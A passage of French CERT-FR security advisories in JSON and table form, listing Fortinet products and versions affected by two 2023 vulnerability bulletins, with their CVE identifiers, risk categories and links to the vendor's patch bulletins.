"description": "FortiClientWindows versions 7.2.x ant\u00e9rieures \u00e0 7.2.2",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClientWindows versions 7.0.x ant\u00e9rieures \u00e0 7.0.10",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions ant\u00e9rieures \u00e0 7.0.13",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 2.0.x",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSIEM versions 6.7.x ant\u00e9ri\u00e9ures \u00e0 6.7.6",
"product": {
"name": "FortiSIEM",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiMail versions 7.4.x ant\u00e9rieures \u00e0 7.4.1",
"product": {
"name": "FortiMail",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClientWindows versions 6.x ant\u00e9rieures \u00e0 6.4.9",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSIEM versions 6.5.x ant\u00e9rieures \u00e0 6.5.2",
"product": {
"name": "FortiSIEM",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiMail versions ant\u00e9rieures \u00e0 7.0.7",
"product": {
"name": "FortiMail",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWLM version 8.x ant\u00e9rieures \u00e0 8.5.5",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiDDOS-F versions 6.5.x ant\u00e9rieures \u00e0 6.5.1",
"product": {
"name": "FortiDDoS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiEDRCollectorWindows versions 5.0.x ant\u00e9rieures \u00e0 5.0.3.1016",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortigate FGT_VM64 versions 7.x ant\u00e9rieures 7.2.7",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAnalyzer versions 7.4.x ant\u00e9rieures \u00e0 7.4.1",
"product": {
"name": "FortiAnalyzer",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSIEM versions ant\u00e9rieures \u00e0 6.4.3",
"product": {
"name": "FortiSIEM",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiManager versions ant\u00e9rieures \u00e0 7.2.4",
"product": {
"name": "FortiManager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSIEM versions 7.0.x ant\u00e9rieures \u00e0 7.0.1",
"product": {
"name": "FortiSIEM",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 7.2.x ant\u00e9rieures \u00e0 7.2.6",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiEDRCollectorWindows versions 5.2.x ant\u00e9rieures \u00e0 5.2.0.4581",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 7.4.x ant\u00e9rieures \u00e0 7.4.1",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions ant\u00e9rieures \u00e0 7.1.3",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiDDOS-F versions ant\u00e9rieures \u00e0 6.4.2",
"product": {
"name": "FortiDDoS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiManager versions 7.4.x ant\u00e9rieures \u00e0 7.4.1",
"product": {
"name": "FortiManager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiMail versions 7.2.x ant\u00e9rieures \u00e0 7.2.5",
"product": {
"name": "FortiMail",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWAN toutes versions (ce produit n\u0027est plus maintenu par l\u0027\u00e9diteur)",
"product": {
"name": "FortiWAN",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 7.2.x",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSIEM versions 6.6.x ant\u00e9ri\u00e9ures \u00e0 6.6.4",
"product": {
"name": "FortiSIEM",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWLM version 8.6.x ant\u00e9rieures \u00e0 8.6.6",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAnalyzer versions ant\u00e9rieures \u00e0 7.2.4",
"product": {
"name": "FortiAnalyzer",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 7.0.x",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2023-36633",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36633"
},
{
"name": "CVE-2023-41676",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-41676"
},
{
"name": "CVE-2023-25603",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25603"
},
{
"name": "CVE-2023-36641",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36641"
},
{
"name": "CVE-2023-38546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38546"
},
{
"name": "CVE-2023-33304",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33304"
},
{
"name": "CVE-2023-26205",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26205"
},
{
"name": "CVE-2023-28002",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28002"
},
{
"name": "CVE-2023-40719",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40719"
},
{
"name": "CVE-2023-29177",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29177"
},
{
"name": "CVE-2023-44248",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44248"
},
{
"name": "CVE-2023-41840",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-41840"
},
{
"name": "CVE-2023-42783",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42783"
},
{
"name": "CVE-2022-40681",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40681"
},
{
"name": "CVE-2023-44252",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44252"
},
{
"name": "CVE-2023-36553",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36553"
},
{
"name": "CVE-2023-44251",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44251"
},
{
"name": "CVE-2023-45582",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45582"
},
{
"name": "CVE-2023-34991",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34991"
},
{
"name": "CVE-2023-38545",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38545"
}
],
"initial_release_date": "2023-11-22T00:00:00",
"last_revision_date": "2023-11-22T00:00:00",
"links": [],
"reference": "CERTFR-2023-AVI-0973",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2023-11-22T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nFortinet. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer\nune ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0\ndistance et un contournement de la politique de s\u00e9curit\u00e9.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-299 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-299"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-306 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-306"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-274 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-274"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-385 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-385"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-518 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-518"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-292 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-292"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-108 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-108"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-290 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-290"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-287 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-287"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-064 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-064"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-135 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-135"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-177 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-177"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-061 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-061"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-151 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-151"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-396 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-396"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-143 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-143"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-142 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-142"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-203 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-203"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-23-265 du 14 novembre 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-23-265"
}
]
}
CERTFR-2023-AVI-0146
Vulnerability from certfr_avis - Published: 2023-02-17 - Updated: 2023-02-17
De multiples vulnérabilités ont été corrigées dans les produits Fortinet. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un contournement de la politique de sécurité et une atteinte à l'intégrité des données.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Fortinet | FortiWeb | FortiWeb versions 5.x à 7.x antérieures à 7.0.5 | ||
| Fortinet | FortiGate | FortiGate versions antérieures à 6.4.2 | ||
| Fortinet | FortiNAC | FortiNAC-F versions antérieures à 7.2.0 | ||
| Fortinet | FortiPortal | FortiPortal versions 7.0.x antérieures à 7.0.3 | ||
| Fortinet | FortiSwitchManager | FortiSwitchManager versions 7.2.x antérieures à 7.2.1 | ||
| Fortinet | FortiOS | FortiOS versions 6.0.x à 7.0.x antérieures à 7.0.9 | ||
| Fortinet | FortiADC | FortiADC versions 5.x à 6.2.x antérieures à 6.2.4 | ||
| Fortinet | FortiAnalyzer | FortiAnalyzer versions 7.0.x antérieures à 7.0.5 | ||
| Fortinet | N/A | FortiAuthenticator versions 6.1.x antérieures à 6.1.1 | ||
| Fortinet | N/A | FortiExtender versions 3.3.x antérieures à 3.3.3 | ||
| Fortinet | N/A | FortiExtender versions 5.3.x antérieures à 7.0.4 | ||
| Fortinet | FortiNAC | FortiNAC versions 8.x à 9.4.x antérieures à 9.4.2 | ||
| Fortinet | FortiSandbox | FortiSandbox versions 3.2.x à 4.x antérieures à 4.2.0 | ||
| Fortinet | FortiADC | FortiADC versions 7.0.x antérieures à 7.0.2 | ||
| Fortinet | FortiProxy | FortiProxy versions 7.2.x antérieures à 7.2.2 | ||
| Fortinet | FortiAnalyzer | FortiAnalyzer versions 7.2.x antérieures à 7.2.2 | ||
| Fortinet | N/A | FortiExtender versions 3.x antérieures à 3.2.4 | ||
| Fortinet | N/A | FortiExtender versions 4.2.x antérieures à 4.2.5 (version à venir) | ||
| Fortinet | FortiSwitch | FortiSwitch versions 7.0.x antérieures à 7.0.4 | ||
| Fortinet | FortiWAN | FortiWAN versions 4.x antérieures à 4.5.10 | ||
| Fortinet | N/A | FortiExtender versions 4.1.x antérieures à 4.1.9 (version à venir) | ||
| Fortinet | FortiSwitch | FortiSwitch versions 6.x antérieures à 6.4.11 | ||
| Fortinet | FortiADC | FortiADC 5.1 all versions | ||
| Fortinet | FortiADC | FortiADC 5.0 all versions | ||
| Fortinet | N/A | FortiExtender versions 4.0.x antérieures à 4.0.3 (version à venir) | ||
| Fortinet | FortiAnalyzer | FortiAnalyzer versions 6.x antérieures à 6.4.9 | ||
| Fortinet | FortiProxy | FortiProxy versions 1.x à 7.0.x antérieures à 7.0.8 | ||
| Fortinet | FortiOS | FortiOS versions 7.2.x antérieures à 7.2.4 | ||
| Fortinet | N/A | FortiAuthenticator versions 5.x à 6.0.x antérieures à 6.0.5 | ||
| Fortinet | FortiSwitchManager | FortiSwitchManager versions 7.0.x antérieures à 7.0.1 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiWeb versions 5.x \u00e0 7.x ant\u00e9rieures \u00e0 7.0.5",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions ant\u00e9rieures \u00e0 6.4.2",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiNAC-F versions ant\u00e9rieures \u00e0 7.2.0",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiPortal versions 7.0.x ant\u00e9rieures \u00e0 7.0.3",
"product": {
"name": "FortiPortal",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSwitchManager versions 7.2.x ant\u00e9rieures \u00e0 7.2.1",
"product": {
"name": "FortiSwitchManager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 6.0.x \u00e0 7.0.x ant\u00e9rieures \u00e0 7.0.9",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions 5.x \u00e0 6.2.x ant\u00e9rieures \u00e0 6.2.4",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAnalyzer versions 7.0.x ant\u00e9rieures \u00e0 7.0.5",
"product": {
"name": "FortiAnalyzer",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAuthenticator versions 6.1.x ant\u00e9rieures \u00e0 6.1.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiExtender versions 3.3.x ant\u00e9rieures \u00e0 3.3.3",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiExtender versions 5.3.x ant\u00e9rieures \u00e0 7.0.4",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiNAC versions 8.x \u00e0 9.4.x ant\u00e9rieures \u00e0 9.4.2",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSandbox versions 3.2.x \u00e0 4.x ant\u00e9rieures \u00e0 4.2.0",
"product": {
"name": "FortiSandbox",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions 7.0.x ant\u00e9rieures \u00e0 7.0.2",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 7.2.x ant\u00e9rieures \u00e0 7.2.2",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAnalyzer versions 7.2.x ant\u00e9rieures \u00e0 7.2.2",
"product": {
"name": "FortiAnalyzer",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiExtender versions 3.x ant\u00e9rieures \u00e0 3.2.4",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiExtender versions 4.2.x ant\u00e9rieures \u00e0 4.2.5 (version \u00e0 venir)",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSwitch versions 7.0.x ant\u00e9rieures \u00e0 7.0.4",
"product": {
"name": "FortiSwitch",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWAN versions 4.x ant\u00e9rieures \u00e0 4.5.10",
"product": {
"name": "FortiWAN",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiExtender versions 4.1.x ant\u00e9rieures \u00e0 4.1.9 (version \u00e0 venir)",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSwitch versions 6.x ant\u00e9rieures \u00e0 6.4.11",
"product": {
"name": "FortiSwitch",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC 5.1 all versions",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC 5.0 all versions",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiExtender versions 4.0.x ant\u00e9rieures \u00e0 4.0.3 (version \u00e0 venir)",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAnalyzer versions 6.x ant\u00e9rieures \u00e0 6.4.9",
"product": {
"name": "FortiAnalyzer",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 1.x \u00e0 7.0.x ant\u00e9rieures \u00e0 7.0.8",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 7.2.x ant\u00e9rieures \u00e0 7.2.4",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAuthenticator versions 5.x \u00e0 6.0.x ant\u00e9rieures \u00e0 6.0.5",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSwitchManager versions 7.0.x ant\u00e9rieures \u00e0 7.0.1",
"product": {
"name": "FortiSwitchManager",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2022-30304",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30304"
},
{
"name": "CVE-2021-42756",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-42756"
},
{
"name": "CVE-2023-23780",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23780"
},
{
"name": "CVE-2022-40678",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40678"
},
{
"name": "CVE-2022-40677",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40677"
},
{
"name": "CVE-2022-33869",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-33869"
},
{
"name": "CVE-2022-30303",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30303"
},
{
"name": "CVE-2022-26115",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26115"
},
{
"name": "CVE-2023-22638",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22638"
},
{
"name": "CVE-2022-42472",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42472"
},
{
"name": "CVE-2022-39948",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-39948"
},
{
"name": "CVE-2022-41335",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41335"
},
{
"name": "CVE-2022-38378",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38378"
},
{
"name": "CVE-2022-30306",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30306"
},
{
"name": "CVE-2023-23782",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23782"
},
{
"name": "CVE-2021-43074",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43074"
},
{
"name": "CVE-2023-23778",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23778"
},
{
"name": "CVE-2023-25602",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25602"
},
{
"name": "CVE-2022-22302",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22302"
},
{
"name": "CVE-2022-27489",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27489"
},
{
"name": "CVE-2022-43954",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-43954"
},
{
"name": "CVE-2022-30299",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30299"
},
{
"name": "CVE-2022-30300",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30300"
},
{
"name": "CVE-2022-38375",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38375"
},
{
"name": "CVE-2022-29054",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-29054"
},
{
"name": "CVE-2022-33871",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-33871"
},
{
"name": "CVE-2022-39952",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-39952"
},
{
"name": "CVE-2023-22636",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22636"
},
{
"name": "CVE-2022-40683",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40683"
},
{
"name": "CVE-2023-23777",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23777"
},
{
"name": "CVE-2023-23779",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23779"
},
{
"name": "CVE-2023-23784",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23784"
},
{
"name": "CVE-2022-38376",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38376"
},
{
"name": "CVE-2021-42761",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-42761"
},
{
"name": "CVE-2022-39954",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-39954"
},
{
"name": "CVE-2022-40675",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40675"
},
{
"name": "CVE-2023-23783",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23783"
},
{
"name": "CVE-2022-27482",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-27482"
},
{
"name": "CVE-2023-23781",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23781"
}
],
"initial_release_date": "2023-02-17T00:00:00",
"last_revision_date": "2023-02-17T00:00:00",
"links": [
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-273"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-329"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-157"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-080"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-133"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-166"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-187"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-167"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-111"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-430"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-260"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-280"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-300"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-460"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-304"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-046"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-362"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-164"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-126"
},
{
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet du 16 f\u00e9vrier 2023",
